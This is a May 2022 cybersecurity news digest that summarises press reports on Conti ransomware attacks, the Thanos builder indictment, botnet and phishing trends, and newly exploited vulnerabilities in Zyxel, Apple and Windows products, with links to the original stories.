Tuesday, May 17, 2022 // (IG): BB //Weekly Sponsor: Unsafe Waters
PSA:
This service remains free because of our sponsors - without the funding they give us this would be forced to move to a paid subscription model. Show them some love.
US Manufacturing Giant Parker Hit by Conti Ransomware Gang
FROM THE MEDIA: US manufacturing company Parker-Hannifin Corporation has announced a data breach exposing employees’ personal identifiable information (PII) after Conti ransomware actors published reportedly stolen data last month.
The firm, one of the largest companies in the world in motion control technologies, revealed in a press release that an unauthorized third party gained access to its IT systems between the dates of March 11 and March 14 2022.
An investigation conducted by the company determined that the unauthorized party accessed and likely acquired certain files on its IT systems, which included information related to current and former employees, their dependents and members of Parker’s Group Health Plans (including health plans sponsored by an entity acquired by Parker). This information may have included individuals’ names in combination with one or more of the following: Social Security numbers, dates of birth, addresses, driver’s license numbers, US passport numbers, financial account information (bank account and routing numbers), online account usernames/passwords, enrollment information (including health insurance plan member ID numbers) and dates of coverage.
READ THE STORY: InfoSecurity Magazine
Ransomware gang threatens to ‘overthrow’ new Costa Rica government, raises demand to $20 million
FROM THE MEDIA: The ransomware group behind an attack on several Costa Rican government ministries levied several violent warnings against the country this weekend, raising the ransom demand to $20 million and threatening to “overthrow” the government of new President Rodrigo Chaves.
In two messages posted to their leak site on Saturday, the Conti ransomware group – which has already leaked 97% of the 670 GB they stole from their attacks – claimed the U.S. government was “sacrificing” Costa Rica and that the country’s government should pay for the decryption keys to unlock their systems.
READ THE STORY: The Record
‘Multi-tasking doctor’ was mastermind behind ‘Thanos’ ransomware builder, DOJ says
FROM THE MEDIA: A French-Venezuelan physician created the “Thanos” ransomware builder and other tools used by cybercriminals, according charges unveiled Monday by the Department of Justice.
The criminal complaint, unsealed in a Brooklyn federal court, said 55-year-old Moises Luis Zagala Gonzalez designed several tools to help those interested in creating and propagating ransomware, including software he named Thanos.
Thanos allows users to concoct their own, custom-made malware for locking up victims’ files and extorting money from them. Zagala provided extensive guidance on how people can launch ransomware affiliate programs and get the biggest ransom payments from victims, the DOJ said.
READ THE STORY: The Record
AGCO Provides Update on Recovery from Ransomware Cyber Attack
FROM THE MEDIA: AGCO, Your Agriculture Company (NYSE:AGCO), a worldwide manufacturer and distributor of agricultural equipment and infrastructure, announced today that the Company’s efforts to restore systems and business operations are continuing successfully following a ransomware cyber attack that was discovered on May 5, 2022. A majority of the affected production sites and parts operations resumed operational activities last week or today. The remainder of the sites are expected to begin operations during the balance of this week, such that all factories and parts operations are operating by the end of this week.
The Company also reported that there had been data exfiltration as a result of the ransomware cyber attack. While the Company does not have retail operations, and therefore no privacy-protected consumer data, the Company is still evaluating the scope and consequences of the data loss. Although damage from the ransomware cyber attack could require more in-depth, and lengthy, remediation and recovery than is currently expected, the Company currently expects to be able to mitigate the production loss from the ransomware cyber attack by increasing production over the remainder of 2022.
READ THE STORY: BusinessWire
Industrial Spy: Selling Stolen Data to Competitors
FROM THE MEDIA: Industrial Spy is the new marketplace where you can obtain the trade secrets of your competitors for millions of dollars or as little as two dollars. In this blog we take a look at this new service and discuss how it is changing the way cybercriminals do business.
Among cybercriminals, data-theft extortion has surged in popularity over the past few years and it continues to gain momentum as organizations deploy more effective defenses against ransomware encryption. In fact, some cybercrime groups have publicly declared that they no longer conduct encryption-based ransomware attacks at all. A trend that the Babuk criminal gang started back in April 2021.
READ THE STORY: Security Boulevard
Microsoft Identifies Botnet Variant Targeting Windows and Linux Systems
FROM THE MEDIA: Microsoft has warned it has discovered a new variant of the Sysrv botnet, which deploys coin miners on both Windows and Linux systems.
In a thread posted on the Microsoft Security Intelligence (@MsftSecIntel) Twitter account, the tech giant revealed the new variant, which it has named Sysrv-K, is exploiting vulnerabilities in the Spring Framework and WordPress to deploy cryptocurrency miners on these systems.
Microsoft explained that the botnet “scans the internet to find web servers with various vulnerabilities to install itself.” These vulnerabilities range from path traversal and remote file disclosure to arbitrary file download and remote code execution.
Sysrv-K targets a mixture of old vulnerabilities, such as those found in WordPress plugins and newer ones like CVE-2022-22947. All of these have patches, according to Microsoft.
READ THE STORY: InfoSecurity Magazine
How cryptocurrencies enable attackers and defenders
FROM THE MEDIA: A rise in the popularity of cryptocurrency-based crime, doubled with a lack of regulation, has paved the way for cybercriminals to extort vast amounts of money from legitimate organizations.
These payouts have produced a sophistication around nonstate-sponsored threat actors, as they now have the funds to expand their operations and capabilities.
Security researchers estimated that the infamous Conti ransomware gang's revenue has surpassed $2 billion -- most of which involved cryptocurrencies. Its success has seen the group grow, so much that it essentially has an HR department to serve and train employees. It even pays employees and associates in digital currencies.
READ THE STORY: TechTarget
Crippling AI cyberattacks are inevitable: 4 ways companies can prepare
FROM THE MEDIA: When Eric Horvitz, Microsoft’s chief scientific officer, testified on May 3 before the U.S. Senate Armed Services Committee Subcommittee on Cybersecurity, he emphasized that organizations are certain to face new challenges as cybersecurity attacks increase in sophistication — including through the use of AI.
While AI is improving the ability to detect cybersecurity threats, he explained, threat actors are also upping the ante.
“While there is scarce information to date on the active use of AI in cyberattacks, it is widely accepted that AI technologies can be used to scale cyberattacks via various forms of probing and automation…referred to as offensive AI,” he said.
However, it’s not just the military that needs to stay ahead of threat actors using AI to scale up their attacks and evade detection. As enterprise companies battle a growing number of major security breaches, they need to prepare for increasingly sophisticated AI-driven cybercrimes, experts say.
READ THE STORY: VentureBeat
Critical bug in Zyxel firewalls, VPNs exploited in the wild
FROM THE MEDIA: A critical vulnerability in Zyxel firewalls and VPNs, which the vendor silently patched last month, is now being exploited in the wild by threat actors.
Last month, Jake Baines, lead security researcher at Rapid7, discovered the bug, tracked as CVE-2022-30525, that could allow for unauthenticated remote command injection through the administrative HTTP interface. He detailed the vulnerability, which was a assigned a 9.8 CVSS score, in a blog post last week. One significant risk to enterprise networks includes the potential for an attacker to establish a reverse shell, which can lead to remote access.
READ THE STORY: TechTarget
HHS Ransomware Report Details Revival of Dangerous LOTL Cyberattack
FROM THE MEDIA: On May 5, 2022, the U.S. Department of Health and Human Services (HHS) issued a report entitled “Ransomware Trends in the HPH Sector” (HHS Report) that reviewed key cybersecurity threats and trends affecting the U.S. healthcare sector.
The HHS Report also discusses the troubling return to prominence of the use by malicious actors of the “Living off the Land” cyberattack (LOTL). LOTL attacks first were utilized with frequency in approximately 2013, and they involve threat actors who use system tools supplied by the host operating system – which are normally used for legitimate purposes – to help launch ransomware and other malicious cyberattacks. LOTL are considered “fileless” attacks and, because of the fact that they utilize tools from the host operating system, they are much more likely than a traditional malware attack to go undetected before doing substantial damage.
READ THE STORY: JDSupra
Russians allegedly storm Ukrainian ISP, blackmail it to switch to Russian networks
FROM THE MEDIA: Ukraine’s state communications agency said Friday that Russian forces had invaded a Kherson-based Internet company and disconnected all equipment, threatening to confiscate it if the company did not connect to Russian networks.
The incident is the latest in a string of attacks mounted against Ukrainian Internet providers and satellite broadband services.
“Free access to information is a major threat to the enemy in the occupied territories of our country,” a statement released by the State Service of Special Communications and Information Protection (SSSCIP) said. “As long as Ukrainians know about the true course of the war, Russian propaganda fails.”
READ THE STORY: CyberScoop
Ransomware gang that infiltrated some Costa Rican systems threatens to overthrow government
FROM THE MEDIA: A ransomware gang that infiltrated some Costa Rican government computer systems has upped its threat, saying its goal is now to overthrow the government.
Perhaps seizing on the fact that President Rodrigo Chaves had only been in office for a week, the Russian-speaking Conti gang tried to increase the pressure to pay a ransom by raising its demand to $20 million.
Chaves suggested Monday in a news conference that the attack was coming from inside as well as outside Costa Rica.
"We are at war and that's not an exaggeration," Chaves said. He said officials were battling a national terrorist group that had collaborators inside Costa Rica.
READ THE STORY: USATODAY
Engineering firm Parker discloses data breach after ransomware attack
FROM THE MEDIA: The Parker-Hannifin Corporation announced a data breach exposing employees' personal information after the Conti ransomware gang began publishing allegedly stolen data last month.
Parker is an Ohio-based corporation specializing in advanced motion and control technologies, with a strong focus in aerospace hydraulic equipment. It has a revenue of $15.6 billion and employs over 58,000 people.
Parker-Hannifin says a security incident occurred between March 11 and March 14, 2022, and that it involved a third party who gained unauthorized access to Parker's computer systems.
READ THE STORY: BleepingComputer
US brings first-of-its-kind criminal charges of Bitcoin-based sanctions-busting
FROM THE MEDIA: US prosecutors have accused an American citizen of illegally funneling more than $10 million in Bitcoin into an economically sanctioned country.
It's said the resulting criminal charges of sanctions busting through the use of cryptocurrency are the first of their kind to be brought in the US.
Under the United States' International Emergency Economic Powers Act (IEEA), it is illegal for a citizen or institution within the US to transfer funds, directly or indirectly, to a sanctioned country, such as Iran, Cuba, North Korea, or Russia. If there is evidence the IEEA was willfully violated, a criminal case should follow. If an individual or financial exchange was unwittingly involved in evading sanctions, they may be subject to civil action.
READ THE STORY: The Register
HTML attachments remain popular among phishing actors in 2022
FROM THE MEDIA: HTML files remain one of the most popular attachments used in phishing attacks for the first four months of 2022, showing that the technique remains effective against antispam engines and works well on the victims themselves.
HTML (HyperText Markup Language) is a language that defines the meaning and structure of web content. HTML files are interactive content documents designed specifically for digital viewing within web browsers. In phishing emails, HTML files are commonly used to redirect users to malicious sites, download files, or to even display phishing forms locally within the browser.
READ THE STORY: BleepingComputer
Apple 0-Day Security Warning For Mac, TV, Watch Users—Attacks Maybe Underway
FROM THE MEDIA: Apple has issued an emergency security update for Mac, TV and Watch users which comes with a warning that the company is "aware of a report that this issue may have been actively exploited." The 0-day, or zero-day if you prefer, vulnerability has the potential to impact users of macOS Big Sur 11, tvOS 15 and watchOS 8.
The critical update, which has yet to be assigned a Common Vulnerabilities and Exposures (CVE) severity rating (it's not unusual for details to be 'reserved' relating to zero-day vulnerabilities while updates are distributed) has been given the reference CVE-2022-22675. What little detail is known currently is that the vulnerability could allow an app to execute arbitrary code and do so with kernel privileges. CVE-2022-22675 sits within the 'AppleAVD' kernel extension that enables audio and video decoding of High Efficiency Video Coding (HEVC), H.264, and VP9 formats.
READ THE STORY: Forbes
Dallas-based Christus Health experienced unauthorized activity on its computer network
FROM THE MEDIA: A Dallas-based Catholic, not-for-profit medical system has experienced a ransomware attack that it says did not affect any private patient health information.
Katy Kiser, director of external communications and social media at Christus Health, confirmed the unauthorized activity on the system’s network.
“Christus Health recently learned of unauthorized activity on its computer network,” Kiser said in a statement. “This was quickly identified and blocked by Christus Information Security. At this time, it appears that the incident is limited and didn’t impact any of Christus Health’s patient care or clinical operations. We are working with industry experts to investigate and address the issue. Christus values and is committed to the privacy and security of all those we are privileged to serve.”
AvosLocker, a new ransomware group, has claimed credit for the attack on the Catholic medical system, according to CyberScoop. It is the second health care system targeted by ransomware in the last two months. Michigan-based McKenzie Health System recently began notifying patients about an attack that included a breach of patient information.
READ THE STORY: Dallasnews
ConnectWise Control Was Used By Bad Actors: Blackpoint Cyber
FROM THE MEDIA: Security firm Blackpoint Cyber has issued a blog post warning that it has observed popular MSP remote control software from ConnectWise being deployed by bad actors in cyberattacks.
Use of the tool—ConnectWise Control – formerly known as ScreenConnect,—by bad actors points to a growing trend of hackers using unaltered enterprise-level software in attacks for a fraction of the cost of developing net new software, Blackpoint Cyber said in the post, which gave a detailed look at several cases it has been monitoring. The attackers used another RMM tool by Total Software Deployment to launch the initial attack, said Blackpoint Cyber.
READ THE STORY: CRN
Hackers Can Abuse Low-Power Mode to Run Malware on Powered-Off iPhones
FROM THE MEDIA: Researchers from a university in Germany have analyzed the low-power mode (LPM) implementation on iPhones and found that it introduces potentially serious security risks, even allowing attackers to run malware on powered-off devices.
LPM is activated when the user switches off the iPhone or when the device shuts down due to low battery. While the device appears completely turned off, LPM ensures that certain features are still available, including the Find My service (for locating a device), digital car keys, payment apps, and travel cards.
While LPM has many benefits, it also introduces some security risks that cannot be ignored, particularly by journalists, activists and other individuals who are more likely to be targeted by well-funded threat actors.
An analysis conducted by a team of researchers from the Secure Mobile Networking Lab at TU Darmstadt showed that, on recent iPhone models, Bluetooth, NFC and Ultra-wideband (UWB) wireless communication systems remain active even after the device has been shut down. They conducted an analysis of the features introduced in iOS 15.
READ THE STORY: SecurityWeek
UK updates strategy to harden nuclear sector from cyberattacks
FROM THE MEDIA: The UK on Friday released new plans to address the cyber risks to the country’s civil nuclear sector as the government helps orchestrate a shift towards net-zero carbon emissions.
In October 2021, the UK government published a lengthy policy paper outlining the critical strategies needed to remove carbon from energy sources by 2050. According to the document, Secretary of State for the Department for Business, Energy & Industrial Strategy (BEIS) Hon Kwasi Kwarteng predicted that the net-zero plans will support 440,000 jobs by 2030. However, as described in a press release from BEIS on Friday, the size increase in the civil nuclear sector puts it at a greater risk of cyberattacks from state-backed threat actors.
READ THE STORY: The Record
Items of interest
Recent Exploits of a Windows Print Spooler Vulnerability Has Been Spotted In The Wild.
FROM THE MEDIA: The US Cybersecurity and Infrastructure Security Agency (CISA) has warned that a security defect in the Windows Print Spooler component, which was patched by Microsoft in February, is being actively abused in the wild. For that purpose, the agency has added the flaw to its Known Exploited Vulnerabilities Catalog, requiring FCEB agencies to fix the problems by May 10, 2022. The security flaw, identified as CVE-2022-22718, is one of four privilege escalation flaws in the Print Spooler that Microsoft fixed as part of their Patch Tuesday updates on February 8, 2022. It's worth mentioning that since the severe PrintNightmare remote code execution vulnerability was discovered last year, Microsoft has patched several Print Spooler problems, including 15 elevations of privilege vulnerabilities in April 2022.
The nature of the attacks and the identity of the threat actors who may be abusing the Print Spooler flaw is unclear to avoid further exploitation by hacker teams. When the patches were released two months ago, Microsoft assigned the tag "exploitation more likely."
The list has been updated with two additional security issues based on "evidence of active exploitation"- CVE-2018-6882 (CVSS rating: 6.1) - Cross-Site Scripting (XSS) vulnerability in Zimbra Collaboration Suite (ZCS). The CVSS score for CVE-2019-3568 is 9.8 - it is a vulnerability in WhatsApp's VoIP stack buffer.
READ THE STORY: Enterprise Security
Last Line of Defense Reliability Through Inducing Cyber Threat Hunting(Video)
FROM THE MEDIA: Abdul Basit Ajmal received bachelor's degree in computer science from COMSATS Islamabad in 2018. He received a masters degree in information security in 2021. Currently he is working as Cyber security specialist at dongamers.com and wemcss.com. He is also working as a cyber security researcher on HEC project at R&D Cyber Security lab COMSATS Islamabad campus. He is a technical program committee member at IEEE HONET. His current research interests include securing industrial grade systems, threat hunting, threat replication, adversary simulation, and risk assessment.
Deciphering Infostealers From Static Analysis to Automated IOC Extraction (Video)
FROM THE MEDIA: Ms. Sadia Bashir is working as Sr. Malware Researcher, holding MS (Computer & Communication Security) from SEECS, NUST Islamabad, she has worked across multiple Computer Science disciplines including Software Defined Networks and Cyber Security. Before joining Ebryx, she subsequently held positions as Software Engineer (Python, C/C++) and Research Assistant in these domains. With Malware analysis as her core skill, she enjoys hunting and reverse engineering malware with analysis automation.
About this Product
These open source products are reviewed from analysts at InfoDom Securities and provide possible context about current media trends in regard to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in their original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at dominanceinformation@gmail.com